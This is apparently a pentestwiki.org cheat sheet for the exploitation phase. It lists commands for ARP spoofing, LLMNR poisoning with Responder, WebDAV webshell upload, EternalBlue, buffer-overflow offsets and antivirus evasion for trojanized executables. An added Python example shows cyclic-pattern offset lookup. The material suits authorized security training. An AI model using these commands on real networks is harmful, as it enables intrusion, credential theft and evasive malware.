Exploitation

From pentestwiki.org

Physical access (LAN)

MAC flooding

root #macof -n 1000


MITM

root #arpspoof


root #ettercap


LLMNR poisoning

Responder is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

root #responder -I eth0 -rv


Find exploits

In kali:

root #searchsploit <SERVICE NAME>


Google:

site:exploit-db.com APP VERSION


$linux-exploit-suggester.sh -k 2.6.9


C:>windows-exploit-suggester.py -i <systeminfo file>


$linuxprivchecker.py


NULL session

C:>net use \\$IP\ipc$ "" "/user:"


WebDAV

$cadaver http://$IP
dav:/> put webshell.aspx


Compilers

To crosscompile windows exploits in linux:

First install the package:

root #apt-get install mingw-w64


  • Command line for C:
$i686-w64-mingw32-gcc 100.c -o 100 -lws2_32

Put the -l libraries after the source file: the linker only pulls in symbols already requested by objects it has seen, so -lws2_32 placed before 100.c can leave WSAStartup and friends as undefined references.

Useful flags:

-l ws2_32 -l mswsock
  • Command line for C++ (the mingw-w64 package installs the i686-w64-mingw32- prefixed toolchain):
$i686-w64-mingw32-g++ main.cpp -o main -static


py2exe http://www.py2exe.org/

bat2exe

Reversing in Linux

Tools:


egg-hunter

$/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T


Buffer Overflow offsets:

$/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
$/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4
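
How the two scripts above relate, as an added example that is not from pentestwiki or Metasploit: a Python reimplementation of the cyclic pattern (Aa0Aa1Aa2...) and of the offset lookup, which interprets an 8-hex-digit query as a little-endian 32-bit register value. The crash value 0x41346141 is a constructed sample.

```python
import itertools
import string
from typing import Optional

# Upper x lower x digit triplets: 26 * 26 * 10 triplets of 3 bytes each
MAX_PATTERN_LEN = 26 * 26 * 10 * 3


def pattern_create(length: int) -> bytes:
    """Cyclic pattern like pattern_create.rb -l <length>.

    The pattern is designed so that every 4-byte window is unique, so a
    4-byte value read from a crashed register maps to exactly one offset.
    """
    if not 0 < length <= MAX_PATTERN_LEN:
        raise ValueError(f"length must be in 1..{MAX_PATTERN_LEN}")
    out = bytearray()
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        out += (upper + lower + digit).encode("ascii")
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(query: str, length: int) -> Optional[int]:
    """Offset lookup like pattern_offset.rb -l <length> -q <query>.

    An 8-hex-digit query (as copied from EIP) is unpacked as a little-endian
    32-bit value; any other query is matched as literal pattern text.
    Returns None when the value did not come from the pattern at all.
    """
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        needle = int(query, 16).to_bytes(4, "little")
    else:
        needle = query.encode("ascii")
    pos = pattern_create(length).find(needle)
    return None if pos == -1 else pos


if __name__ == "__main__":
    # Constructed crash: EIP = 0x41346141 is "Aa4A" in the pattern, offset 12.
    print(pattern_create(24).decode("ascii"))
    print(pattern_offset("41346141", 256))  # 12
    print(pattern_offset("773870B4", 256))  # None: contains non-pattern bytes
```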


Reversing in Windows

Tools:

  • IDA Pro
  • OllyDbg
  • Immunity Debugger
  • mona.py Corelan Repository for mona.py
  • API Monitor is free software that lets you monitor and control API calls made by applications and services. It's a powerful tool for seeing how applications and services work, or for tracking down problems in your own applications.

Fuzzing

Linux

  • sfuzz (kali)
  • radamsa
  • spike

Windows

AFL is a popular fuzzing tool for coverage-guided fuzzing. The tool combines fast target execution with clever heuristics to find new execution paths in the target binary. It has been successfully used to find a large number of vulnerabilities in real products.

AV Evasion

  • Veil: encrypts/encodes/obfuscates msfvenom-like payloads

Thanks @ReneFreingruber

To remove /var/lib/veil strings and make reverse engineering harder:

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil
  • bat2exe

Write a .bat script with your trojan and use bat2exe to get a FUD executable to trojanize an exe or service. https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe

  • Phantom evasion

https://github.com/oddcod3/Phantom-Evasion Interacts with msfvenom.

SMB exploitation

Eternalblue (Target: Windows 7 and Server 2008 R2 (x64) All Service Packs):

msf>use exploit/windows/smb/ms17_010_eternalblue


$nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24

